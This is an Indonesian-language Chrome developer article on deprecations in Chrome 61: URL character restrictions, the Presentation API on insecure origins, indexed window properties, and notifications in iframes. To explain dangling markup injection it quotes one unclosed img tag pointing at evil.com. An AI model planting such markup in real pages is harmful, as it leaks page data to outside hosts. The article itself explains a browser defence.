Di hampir setiap versi Chrome, kami melihat sejumlah update dan peningkatan yang signifikan pada produk, performanya, dan juga kemampuan Platform Web. Artikel ini menjelaskan penghentian penggunaan dan penghapusan di Chrome 61, yang masih dalam versi beta per 3 Agustus. Daftar ini dapat berubah sewaktu-waktu.
Keamanan dan Privasi
Memblokir resource yang URL-nya berisi karakter '\n' dan '<'
Ada jenis peretasan yang disebut injeksi markup bergetar. URL yang terpotong digunakan untuk mengirim data ke endpoint eksternal. Misalnya,
pertimbangkan halaman yang berisi <img src='https://evil.com/?
. Karena URL tidak memiliki tanda kutip penutup, browser akan membaca kutipan berikutnya yang muncul dan memperlakukan karakter dalam tanda kurung seolah-olah itu adalah URL tunggal.
Chrome 61 mengurangi kerentanan ini dengan membatasi kumpulan karakter
yang diizinkan dalam atribut href
dan src
. Secara khusus, Chrome akan berhenti
memproses URL jika menemukan karakter baris baru (\n
) dan kurang dari
karakter (<
).
Developer dengan kasus penggunaan yang sah untuk baris baru dan kurang dari karakter dalam URL sebaiknya meng-escape karakter ini.
Intent untuk Menghapus | Pelacak Chromestatus | Bug Chromium
Menghentikan penggunaan dan menghapus Presentation API pada konteks yang tidak aman
Telah ditemukan bahwa pada origin yang tidak aman, Presentation API dapat digunakan sebagai vektor peretasan pada origin yang tidak aman. Karena layar tidak memiliki kolom URL, API dapat digunakan untuk melakukan spoofing konten. Anda juga dapat memindahkan data secara tidak sah dari presentasi yang sedang berjalan.
Sejalan dengan tujuan Blink untuk menghapus fitur canggih pada origin yang tidak aman, kami berencana menghentikan dan
menghapus dukungan untuk Presentation API pada konteks yang tidak aman. Mulai Chrome
61, PresentationRequest.start()
tidak akan berfungsi lagi pada origin yang tidak aman.
Intent untuk Menghapus | Pelacak Chromestatus | Bug Chromium
JavaScript
Larang penentuan properti yang diindeks di Windows
Sebelumnya, beberapa browser mengizinkan penetapan JavaScript seperti berikut:
window[0] = 1;
Spesifikasi HTML saat ini mencatat bahwa ini merupakan pelanggaran eksplisit terhadap spesifikasi JavaScript. Dengan demikian, kemampuan ini akan dihapus di Chrome 61. Sejak Februari 2016, Firefox sudah mematuhi kebijakan.
Hapus penggunaan notifikasi dari iframe yang tidak aman
Permintaan izin dari iframe dapat membingungkan pengguna karena sulit untuk membedakan asal halaman penampung dan asal iframe yang membuat permintaan. Jika cakupan permintaan tidak jelas, pengguna akan kesulitan untuk menilai apakah akan memberikan atau menolak izin.
Melarang notifikasi di iframe juga akan menyelaraskan persyaratan untuk izin notifikasi dengan notifikasi push, sehingga memudahkan developer.
Developer yang memerlukan fungsi ini dapat membuka jendela baru untuk meminta izin notifikasi.
Intent untuk Menghapus | Pelacak Chromestatus | Bug Chromium